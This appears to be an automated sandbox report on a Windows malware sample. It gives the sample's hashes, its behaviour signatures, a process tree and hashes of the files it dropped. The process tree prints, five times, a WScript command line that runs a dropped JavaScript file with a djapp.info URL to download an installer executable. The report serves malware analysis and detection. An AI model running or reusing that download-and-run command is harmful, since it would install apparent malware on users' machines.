Analysis
-
max time kernel
132s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
07/09/2024, 06:36
Static task
static1
Behavioral task
behavioral1
Sample
d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe
Resource
win7-20240704-en
General
-
Target
d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe
-
Size
184KB
-
MD5
d14c74193f0d7c558c59ebc5cc43d9c1
-
SHA1
24495e1d4d9db3054b84f0e1fe8fc41b530ac2e8
-
SHA256
810f62f62724ecc9d32fe2a3836cd35b0f6004fbd0f5b1c5633c264b1a5d1f43
-
SHA512
09cabf9785b55aaed7c79d8a3bbf03ca0418a45aaeddf014891d7be6809e5c7cdea913cd48d4ecd1440e7acd1a1706c3de2b39771b0bbb0361ee3dab7318a950
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Y:/7BSH8zUB+nGESaaRvoB7FJNndnF
Malware Config
Signatures
-
Blocklisted process makes network request 13 IoCs
flow pid Process 6 2136 WScript.exe 8 2136 WScript.exe 10 2136 WScript.exe 13 2204 WScript.exe 14 2204 WScript.exe 27 892 WScript.exe 28 892 WScript.exe 29 892 WScript.exe 31 2940 WScript.exe 32 2940 WScript.exe 35 2940 WScript.exe 38 2264 WScript.exe 39 2264 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2908 wrote to memory of 2136 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 30 PID 2908 wrote to memory of 2136 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 30 PID 2908 wrote to memory of 2136 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 30 PID 2908 wrote to memory of 2136 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 30 PID 2908 wrote to memory of 2204 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 33 PID 2908 wrote to memory of 2204 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 33 PID 2908 wrote to memory of 2204 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 33 PID 2908 wrote to memory of 2204 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 33 PID 2908 wrote to memory of 892 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 35 PID 2908 wrote to memory of 892 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 35 PID 2908 wrote to memory of 892 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 35 PID 2908 wrote to memory of 892 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 35 PID 2908 wrote to memory of 2940 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 37 PID 2908 wrote to memory of 2940 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 37 PID 2908 wrote to memory of 2940 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 37 PID 2908 wrote to memory of 2940 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 37 PID 2908 wrote to memory of 2264 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 39 PID 2908 wrote to memory of 2264 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 39 PID 2908 wrote to memory of 2264 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 39 PID 2908 wrote to memory of 2264 2908 d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe 39
Processes
-
C:\Users\Admin\AppData\Local\Temp\d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\d14c74193f0d7c558c59ebc5cc43d9c1_JaffaCakes118.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2136
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2204
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:892
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2940
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufAD11.js" http://www.djapp.info/?domain=zXbNFoNZhU.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufAD11.exe2⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:2264
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57fb5fa1534dcf77f2125b2403b30a0ee
SHA1365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA25633a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD54693b6d22b04983e7973afd9e91153ef
SHA1f5cc1315c09a51554becfb89dad4eabad85b35d5
SHA256e2a2c4df0441b28d538c3e0b7c96c5a9a792a1d44c02c3b35ab274c0288bc5c3
SHA512c3e230f43d4ca7118562c0bd9f74beacbbe94c9d4a37aefab5363c5389ee3420a8f7e0c7537cf60a9d792770295958a287ca6811ed12469a1773131794176c9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5fab7620e279c630e8bb2a476b2808e77
SHA19d338a54b6f635f5d683ca3abc62e21522f58696
SHA25689cf059cca36062dd1682a2859bd094d719d0195cea3f6132a232da403f41fc1
SHA512e3534cd8f05aba1146a590d43b213d06eb03f7c8b3e58bb5b4c2e17c8f9131bae7aabdd08977bfb5d0ad4b56fbb25d0be13c75cdf94d438ca517b4a90671baad
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5289abcf8224b44eaea906e41a459d976
SHA163beaa54cc181d915833c862c105a44668aeb5e6
SHA25675217dd506fe4ea9658acddd73c0db9c9827754c57412db15c321cd1e06d1167
SHA51262a88351dfc87a23e3849f63c5b7ac06bcf78590711b9aae4289d0d948acd183c1ea7f550a8654e19d2daacf570cde770a54dc9b95716ac069b5e25a2a1363af
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5d68e23b37a527bed8494aaa2e767ebd4
SHA197699c236805286b8485f889da91be89a3e98647
SHA256fe615a8c04217a639ce221f313f7fa97084b4a3b53a238881eb80edfb9c1d8fc
SHA512494aa41f7904dd1dcc6543ea722190d06b466ab66c26b17e2c3d04928154eaed5462f5903bfa3a3f55ecd0bcfd25f971de9a780144afebb1cf9457af5b35ebcc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\domain_profile[1].htm
Filesize6KB
MD5fd41ee289936347c3be793e88b2ac69c
SHA123112b144ce4db4487413e03443389fbd2547df7
SHA256484506d6bee5d0d90a6a8bd2cd8f74cc011841ef531322b89383d4b39de98245
SHA5126e6f0b095b143a7a4235df945ab71426d8f96a36964bb0dc412ec756d2e2ea0a03a3b969a4913fd7454c73128ba234bbcbb7ddb4f2779b0d459be8feb01a4e11
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\84EXSCRK\domain_profile[1].htm
Filesize40KB
MD5530d4cb46e29f2dbe35cfbe37b28f783
SHA11e7ae136dcad314deaadc997639bc61cf5dbacf2
SHA256056cc137a1ff48cb7c634eea32091f384dcf9432c6754d7c8268ac02c288e5f2
SHA5123d6cb4f23de4c2b3ce728509c76071bdb93013a90d5f29692a5b642efa032a7adcde415742ffb1bd25bbcbb975931cae241ca3a5287ce9b1ecb59b712751755b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR5\domain_profile[1].htm
Filesize6KB
MD5aa6d1bbf0fde51d4c8f89f44301256a1
SHA1b12a163cb6d19411d635be8e0362e787e407d3c1
SHA256feb5c209e09f80effd3611d68878ea6d800dccf174c0e6be93ea0a3b95918e14
SHA5122fc135f196d09a63f20332a48b2b008b47d43c4804d5cd462a33f8a8fe6fb362a56b83f380cb3a282e54f6b4ee1fb7538777d70f15914af011cdbe83779464c4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OX8Z8GR5\domain_profile[1].htm
Filesize40KB
MD5ec3f9d796906cbbea26434d46a9b175d
SHA1b7cbb73d155840f9778aa10d61d1cb1c4fa11b77
SHA2561cc202beca2905e281721cbd761512bb81a6d3c64ee1e116a93d8232876f8907
SHA5122b60d30e4192920edd3374572cf8793f25c2175bd9538d3cbb4682f3a236c6bb9a51eee5a0cd9fd57a7d1e03e58964f50e36e5b354ebac18465b8e39b57ee3f3
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
175B
MD5897e592c9f945449a80f2511ddd57e2e
SHA1695333c5812551e507f677bfaa8eea2e0541bde8
SHA2568b54b569e9b21ff77b4b6066be772e8d15898203fa0eeec5810da866d615020f
SHA5129435dcbaa40cb13852312135ef77ffe0f8ce0ab5c9c831e534913d978b65ba7c2ca24a4f0056aad5df851f995211fe26942660bd2a4dc8a488e6b3b5cae5ef64